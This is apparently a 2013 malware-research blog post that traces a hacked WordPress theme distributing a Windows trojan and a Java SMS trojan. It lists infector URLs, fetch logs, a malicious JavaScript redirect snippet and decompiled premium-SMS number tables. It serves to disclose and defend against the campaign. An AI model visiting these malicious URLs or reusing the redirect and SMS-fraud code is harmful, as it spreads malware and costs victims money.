Here we go!
Recognizing the infection pattern reported in UrlQuery below:#MalwareMustDiehttp://urlquery.net/report.php?id=678590Bumped us to a large amount (hundreds) of malware infector URLs:inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=YQfpcUvsYV inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=xvGoLsqGhV inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=xxuMdywDDk inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=VMmujweIUQ inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=uxsBosuiCw inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=TxtyywoBdy inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=UImqwXIMoh inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=tEeWvHTtYn inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=RfkOKspdvC inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=qwBQIWUwOM inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=pPNhxcgVJk inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=pIYmBHGgee inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=pBhEkPUQqf inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=OHRLfRUvGK inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=nvDLJcwTuQ inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=msvIMqjIdB inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=Luncwlsxkw inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=LvGpxhVGuS inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=lVlRWCfJvd inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=lLcsskMdbK inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=LprlKrYScJ inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=kqbeUHWYWb inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=KqqjBhNpeM inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=LFGtIvwBnQ inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=KpOuJWkLhY inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=KfObcIdoVm inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=IkxUNXUHeP inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=HYxgeMlwsp inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=hlwfpHMCMM inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=HcOGfViMqN : :It is the vulnerable Wordpress with Theme "Stroy/Red Stroy" injected - with malware download URL in random made script at fake "akismeet.php" script. I think the theme was made in Russia.The PC Threat
Shortly, we fetched the sample:Resolving inbuildhouse.ru... seconds 0.00, 178.236.176.74 Caching inbuildhouse.ru => 178.236.176.74 Connecting to inbuildhouse.ru|178.236.176.74|:80... seconds 0.00, connected. : GET /wp-content/themes/stroy/akismeet.php?ncrnd=hQwgNcBXro HTTP/1.0 Accept: */* Host: inbuildhouse.ru Connection: Keep-Alive : HTTP request sent, awaiting response... : HTTP/1.1 302 Found Server: nginx/1.1.5 Date: Fri, 11 Jan 2013 11:46:02 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/5.2.17 Location: h00p://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA : 302 Found Location: h00p://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA [following] Skipping 0 bytes of body: [] done. --20:46:10-- h00p://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA => `update.php@q=PHOTO-DEVOCHKA' Reusing existing connection to inbuildhouse.ru:80. : GET /wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA HTTP/1.0 Accept: */* Host: inbuildhouse.ru Connection: Keep-Alive : HTTP request sent, awaiting response... : HTTP/1.1 200 OK Server: nginx/1.1.5 Date: Fri, 11 Jan 2013 11:46:03 GMT Content-Type: application/octet-stream Content-Length: 184243 Connection: keep-alive X-Powered-By: PHP/5.2.17 Accept-Ranges: bytes Content-disposition: attachment; filename="PHOTO-DEVOCHKA.exe" : 200 OK Length: 184,243 (180K) [application/octet-stream] 20:46:13 (78.58 KB/s) - `PHOTO-DEVOCHKA.exe' saved [184243/184243]We got the sample which turned out to be a Trojan VBS Win32/Bicololo. Below is the Virus Total scan result:SHA1: f05b0a6734391f19838bdcb41d29d173a1d45b02 MD5: f54715875c3327953965072927e86bd0 File size: 179.9 KB ( 184243 bytes ) File name: GOLAYA-BABE.exe File type: Win32 EXE Tags: peexe bobsoft Detection ratio: 11 / 44 Analysis date: 2013-01-11 12:51:39 UTC ( 5 minutes ago ) URL --->>[VirusTotal] Malware Names: GData : VBS:Bicololo-BG TrendMicro-HouseCall : TROJ_GEN.F47V0111 Avast : VBS:Bicololo-BG [Trj] Kaspersky : UDS:DangerousObject.Multi.Generic Jiangmin : Trojan/StartPage.bim Malwarebytes : Trojan.StartPage.ooo Panda : Trj/Qhost.MR Ikarus : Trojan.Win32.Qhosts Kingsoft : Win32.Troj.Undef.(kcloud) TheHacker : Trojan/Bicololo.a Microsoft : Trojan:Win32/QHosts.BFVirus Total & (ESET) made a good description and analysis about this trojan. Our analysis result-->>[HERE] (matched to the ESET Bicololo Trojan description). Below is the network traffic we captured (click to enlarge)The Mobile Threat
The story is not ending yet, the hacked site was filled with other infectors. we accidentally found this link:inbuildhouse.ru/wp-content/themes/stroy/Then we followed it...=> `inbuildhouse.ru/wp-content/themes/stroy/index.html' Resolving inbuildhouse.ru... 178.236.176.74 Connecting to inbuildhouse.ru|178.236.176.74|:80... connected. HTTP request sent, awaiting response... 302 Found Location: h00p://mampoks.ru [following] --20:59:13-- h00p://mampoks.ru/ => `mampoks.ru/index.html' Resolving mampoks.ru... 195.128.18.244 Connecting to mampoks.ru|195.128.18.244|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 369 [text/html] 20:59:13 (11.45 MB/s) - `mampoks.ru/index.html' saved [369/369]to be forwarded to OTHER (mampoks.ru) infector. And download the index.html of that infector instead, which containing - a redirector script to ANOTHER HOST's landing page at ktozdesj.ru↓<script language="JavaScript1.1" type="text/javascript"> <!-- location.replace("h00p://ktozdesj.ru/l.php?l=o&r=9578&a=32"); //--> </script> <noscript> <meta http-equiv="Refresh" content="0; URL=h00p://ktozdesj.ru/l.php?l=o&r=9578&a=32">Your browser will download:Resolving ktozdesj.ru... seconds 0.00, 93.170.107.130 Caching ktozdesj.ru => 93.170.107.130 Connecting to ktozdesj.ru|93.170.107.130|:80... seconds 0.00, connected. GET /l.php?l=o&r=9578&a=32 HTTP/1.0 Referer: h00p://inbuildhouse.ru/wp-content/themes/stroy/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Accept: */* Host: ktozdesj.ru Connection: Keep-Alive HTTP request sent, awaiting response... : HTTP/1.1 200 OK Server: nginx admin Date: Fri, 11 Jan 2013 12:01:13 GMT Content-Type: text/html Content-Length: 5307 Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/5.2.17 Set-Cookie: PHPSESSID=cbd9f50b900881ae84c2ecfa6cb65889; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=cbd9f50b900881ae84c2ecfa6cb65889; expires=Fri, 11-Jan-2013 13:01:13 GMT; path=/; domain=.localhost 200 OK Length: 5,307 (5.2K) [text/html] 21:01:21 (105.95 MB/s) - `l.php' saved [5307/5307]Which having malicious link below:ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32PoC:$ grep "getfile" 1.php l.php(24): <a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32"><img src="landings/images/opera/images/mobile-logo.png" alt="ミ榧アミスミセミイミサミオミスミクミオ Opera Mini"></a> l.php(35): <a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" class="tab-link"> l.php(66): <form action="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" method="post" class="close"> l.php(80): <p id="add-source"><a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" class="button">ミ。ミ墟籍ァミ籍「ミャ ミイミオムム・クム・7.0</a></p> l.php(84): <a class="art-opn" href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" title="ミ榧アミスミセミイミク ム・イミセム・Opera!" target="_blank"> l.php(139): <p id="add-source"><a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" class="button">ミ。ミ墟籍ァミ籍「ミャ ミイミオムム・クム・7.0</a></p>If your browser is mobile/Android you will be redirected to these url↑ And what's this lead us to?HTTP/1.1 200 OK Server: nginx admin Date: Fri, 11 Jan 2013 12:14:09 GMT Content-Type: application/java-archive Content-Length: 251481 Connection: close X-Powered-By: PHP/5.2.17 Set-Cookie: PHPSESSID=4db23831b11474b4f734f1ae64594967; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=4db23831b11474b4f734f1ae64594967; expires=Fri, 11-Jan-2013 13:14:09 GMT; path=/; domain=.localhost Content-Disposition: attachment; filename="browser_update_install.jar"Yes, another jar payload "browser_update_install.jar".File Info: browser_update_install.jar 2013/01/11 21:16 251,481 45078333eb39116c154899d3bf5501e8We analized the code to find malicious SMS sending functions-->>[HERE] Yes, it sends SMS for the international used to specific numbers, with supporting international code to call: Some number to reach...public final class k { private static String[] a = { "79202909090", "79206909090", "79219909090", "79222909090", "79232909090", "79242000690", "79262909090", "79272909090", "79282000002", "79289900028", "89282000002" }; private static String[] b = { "79168999100", "79168960220", "79116009993", "79114009993", "73434800248", "79147991000", "79147991000", "79106609999", "79135330003", "79168999800", "79139869990", "79107459999", "79171002003", "79171002003", "79112009993", "70957699100", "70957699101", "70957699102", "70957699800", "79027899999", "79029889991", "79104999104", "79107899999", "79126313456", "79128800003", "79128900003", "79129200003", "79168999101", "79168999102" }; private static String[] c = { "7922", "7929", "7932" }; : : static {{ "79037011111", "73339077000", "77059077000", "790173100", "79033619502" }[5] = "79037011110"; { "7901630", "7901631", "7901632", "7901633", "79016340", "79016341", "79016342", "79016343", "79016344", "7901640", "7901641", "790165", "790166", "7901670", "7901671", "7901672", "7901673", "7901674", "790217", "7902510", "7902511", "7902512", "7902513", "7902514", "7902515", "7902516", "7902519", "790254", "7902560", "7902561", "7902566", "7902567", "7902568", "7902569", "7902576", "7902577", "7902578", "7902579", "790276", "790411", "790412", "790413", "790414", "790415", "790864", "790865", "790866", "795005", "795006", "795007", "795008", "795009", "795010", "795011", "795012", "795013", "795014", "795261", "795262" }[59] = "795263"; d = new String[] { "7701", "7702", "7775", "7778", "73009300300", "73009300301" }; e = new String[] { "7908228", "7908229", "795297", "795298", "790219", "7902285", "7902286", "7902504", "7902507", "795025", "7950660", "7950661", "7950962", "7950963", "795225", "795230", "795326", "795393", "790408", "790409", "790453", "790878", "795071", "795113", "795114", "795115", "795176", "795242", "795243", "7900355", "7900356", "7900357", "7900358", "7900359", "790036", "7900370", "7900371", "7900372", "7900373", "7900374", "795069", "795296", "795327", "795328", "795329", "7902147", "7902148", "7902149", "7902283", "7902284", "7908225", "7908226", "7908291", "7908292", "7908293", "7908294", "7908295", "795068", "795172", "795248", "795390", "79004735", "79004736", "79004737", "79004738", "79004739", "7900474", "7900475", "7900476", "7900477", "7900478", "7900479", "7900480", "7900481", "7900482", "79004830", "79004831", "79004832", "79004833", "79004834", "790403", "790425", "7904260", "7904261", "790459", "790465", "7904857", "7904858", "7904859", "7904955", "7904956", "7904957", "7904958", "7904959", "795173", "795174", "795350", "795351", "7953520", "7953521", "7953522", "7953523", "7953524", "7900300", "7900301", "7900302", "7900303", "7900304", "7900305", "7900306", "7900307", "7900308", "7900309", "7904210", "7904211", "7904212", "7904213", "7904214", "790813", "790814", "795075", "795076", "795077", "795154", "795155", "795156", "795185", "795186", "795187", "795210", "795254", "795255", "7904245", "7904246", "7904247", "7904248", "7904249", "7904275", "7904276", "7904277", "7904278", "7904279", "790431", "790483", "795015", "795016", "795017", "795081", "795082", "795083", "795119", "795120", "795121", "795240", "795241", "79534115", "79534116", "79534117", "79534118", "79534119", "7900345", "7900346", "7900347", "7900348", "7900349", "7900350", "7900351", "7900352", "7900353", "7900354", "7902250", "7902251", "7902252", "7908290", "795067", "795205", "795211", "795279", "795331", "795332", "795333", "795346", "790437", "790457", "790496", "790499", "790894", "790895", "795026", "795027", "795057", "795058", "795059", "795116", "795117", "795118", "795157", "795158", "795159", "795160", "795161", "7952165", "7952166", "7952167", "7952168", "7952169", "7952170", "7952171", "7952172", "7952173", "7952174", "7953059", "7953060", "7953061", "7953062", "7953063", "7953064", "7953065", "7953066", "7953067", "7953068", "790052", "7951347", "7951348", "7951349", "7951350", "7951351", "7951352", "7951353", "7951354", "7951355", "7951356", "795313", "795367", "795368", "795369", "795394", "795024", "795364", "795365", "795366", "7900229", "790023", "790024", "790025", "790026", "790027", "790028", "7900290", "7900291", "7900292", "7900293", "7900294", "7900295", "7900296", "7900297", "7900298", "7902403", "7902404", "7902405", "7902406", "7902407", "7902408", "790867", "790868", "7908690", "7908691", "7908692", "7908693", "795281", "795282", "795283", "795284", "795285", "795286", "795287", "7953069", "795307", "795308", "795309", "795310", "7953110", "7953111", "7953112", "7953113", "7953114", "7953115", "7953116", "7953117", "7953118", "79534110", "79534111", "79534112", "79534113", "79534114", "790452", "790812", "795087", "795107", "795108", "795131", "795132", "795133", "795249", "7904218", "7904219", "790428", "790429", "790468", "790469", "795080", "795130", "795259", "790213", "7902281", "7902282", "7908605", "7908606", "7908607", "795089", "7951295", "7951296", "7951297", "795229", "795330", "795375", "7952314", "790404", "790405", "790406", "790439", "790815", "790816", "790823", "795060", "795061", "795062", "795244", "795245", "795276", "795277", "795278", "795355", "795356", "795357", "795136", "795137", "795138", "795139", "795290", "795291", "795292", "795293", "795294", "795376", "795377", "795378", "795379", "795380", "7953857", "7953858", "7953859", "795386", "795387", "795388", "7953890", "7953891", "7953892", "7953893", "7953894", "7953895", "7953896", "790407", "790432", "790458", "790482", "790810", "790811", "790831", "790879", "790880", "795021", "795033", "795078", "795079", "795095", "795140", "795141", "795142", "795339", "795347", "795361", "795362", "795381", "7900455", "7900456", "7900457", "7900458", "7900459", "7900460", "7900461", "7900462", "7900463", "7900464", "7953525", "7953526", "7953527", "7953528", "7953529", "795353", "795354", "795175", "795323", "795324", "7953250", "7953251", "7953252", "7953253", "7953254", "790434", "790444", "790450", "790817", "790818", "790819", "790850", "790851", "795084", "795085", "795086", "795149", "795150", "795151", "795152", "795153", "795182", "795183", "795184", "795256", "795257", "795258", "795260", "795110", "795212", "795373", "795374", "790433", "790451", "790455", "790460", "790461", "790463", "790464", "795000", "795001", "795002", "795003", "795004", "795022", "795164", "795165", "795166", "795167", "795168", "795220", "795221", "795222", "795223", "795224", "795226", "795227", "795228", "795235", "795236", "795237", "795238", "795239", "795314", "795315", "795316", "795317", "795334", "795335", "795336", "795337", "7900219", "7900220", "7900221", "7900222", "7900223", "7900224", "7900225", "7900226", "7900227", "7900228", "790436", "790828", "795070", "795169", "795170", "795171", "795253", "795299", "790410", "790420", "790422", "790423", "7904270", "7904271", "7904272", "7904273", "7904274", "790486", "7908328", "7908329", "7908715", "7908716", "7908717", "7908718", "7908719", "7950308", "7950565", "7950566", "7950567", "7950568", "7950569", "795312", "795370", "795371", "795372", "79004715", "79004716", "79004717", "79004718", "79004719", "7900472", "79004730", "79004731", "79004732", "79004733", "79004734", "790400", "790401", "790402", "790435", "795206", "795215", "7952160", "7952161", "7952162", "7952163", "7952164", "7952175", "7952176", "7952177", "7952178", "7952179", "7952180", "7952181", "7952182", "7952183", "7952184", "795280", "795288", "795289", "795391", "795392", "795090", "795091", "795092", "7952015", "7952016", "7952017", "7952018", "7952019", "7952185", "7952186", "7952187", "7952188", "7952189", "795318", "795319", "7953419", "795342", "795343", "7953440", "7953441", "7953442", "7953443", "795395", "795396", "7953970", "7953971", "7953972", "7953973", "7953974", "790430", "790497", "790804", "790805", "790806", "790857", "790858", "795072", "795073", "795074", "795111", "795112", "795144", "795145", "795146", "795147", "795148", "795177", "795178", "795179", "795180", "795181", "795250", "795251", "795252" }; { "38050", "38095", "38066" }[3] = "38099"; { "790208", "7902200", "7902203", "7902204", "7902205", "7902206", "7902207", "7902208", "7902209", "790234", "7902352", "7902353", "7902354", "79047299", "790852", "790853" }[16] = "795023"; f = new String[] { "7705", "7777", "7771" }; }}Some country code...jdField_a_of_type_JavaUtilHashtable.put("7840", "ab"); jdField_a_of_type_JavaUtilHashtable.put("7940", "ab"); jdField_b_of_type_JavaUtilHashtable.put("994", "az"); jdField_b_of_type_JavaUtilHashtable.put("213", "alzhir"); jdField_b_of_type_JavaUtilHashtable.put("374", "am"); jdField_b_of_type_JavaUtilHashtable.put("375", "by"); jdField_b_of_type_JavaUtilHashtable.put("359", "bolgaria"); jdField_b_of_type_JavaUtilHashtable.put("387", "bosniaigerc"); jdField_b_of_type_JavaUtilHashtable.put("502", "gvatemala"); jdField_b_of_type_JavaUtilHashtable.put("504", "gonduras"); jdField_b_of_type_JavaUtilHashtable.put("852", "gonkong"); jdField_b_of_type_JavaUtilHashtable.put("972", "israel"); jdField_b_of_type_JavaUtilHashtable.put("962", "iordania"); jdField_b_of_type_JavaUtilHashtable.put("855", "kambodzha");Virus Total checks shows:MD5: 45078333eb39116c154899d3bf5501e8 File size: 245.6 KB ( 251481 bytes ) File name: browser_update_install.jar File type: JAR Tags: jar Detection ratio: 31 / 46 Analysis date: 2013-01-11 12:17:18 UTC ( 1 hour, 58 minutes ago ) URL --->>[VirusTotal] Malware Names: MicroWorld-eScan : Trojan.Java.Smssend.W nProtect : Trojan.Java.Smssend.W CAT-QuickHeal : Trojan.JavaExploit McAfee : Generic.dx!bfzk K7AntiVirus : Trojan F-Prot : Java/SMSer.L Symantec : Trojan.Gen.2 Norman : SMSSend.CX TotalDefense : Java/SMSTroj.Q TrendMicro-HouseCall : TROJ_GEN.FCBHZIK Avast : Java:SMSSend-GF [Expl] ClamAV : Android.Trojan.Smssend-7 Kaspersky : Trojan-SMS.J2ME.Jifake.my BitDefender : Trojan.Java.Smssend.W NANO-Antivirus : Trojan.SmsSend.wgugf Sophos : Troj/Jifake-A Comodo : UnclassifiedMalware F-Secure : Trojan.Java.Smssend.W DrWeb : Java.SMSSend.780 AntiVir : JAVA/Badorg.BA TrendMicro : JAVA_SMSAGE.NT Emsisoft : Trojan.Java.Smssend.W (B) Jiangmin : Trojan/AndroidOS.afcr Microsoft : Trojan:Java/SMSer.AY ViRobot : J2ME.A.Jifake.2840 GData : Trojan.Java.Smssend.W Commtouch : Java/SMSer.L ESET-NOD32 : a variant of J2ME/TrojanSMS.Agent.DH Ikarus : JAVA.SMSSend Fortinet : Java/SMSBoxer.AQ!tr AVG : Java/SMS.OOResearch Materials
To the fellow researchers & AV industry, samples & analysis data is-->>[HERE]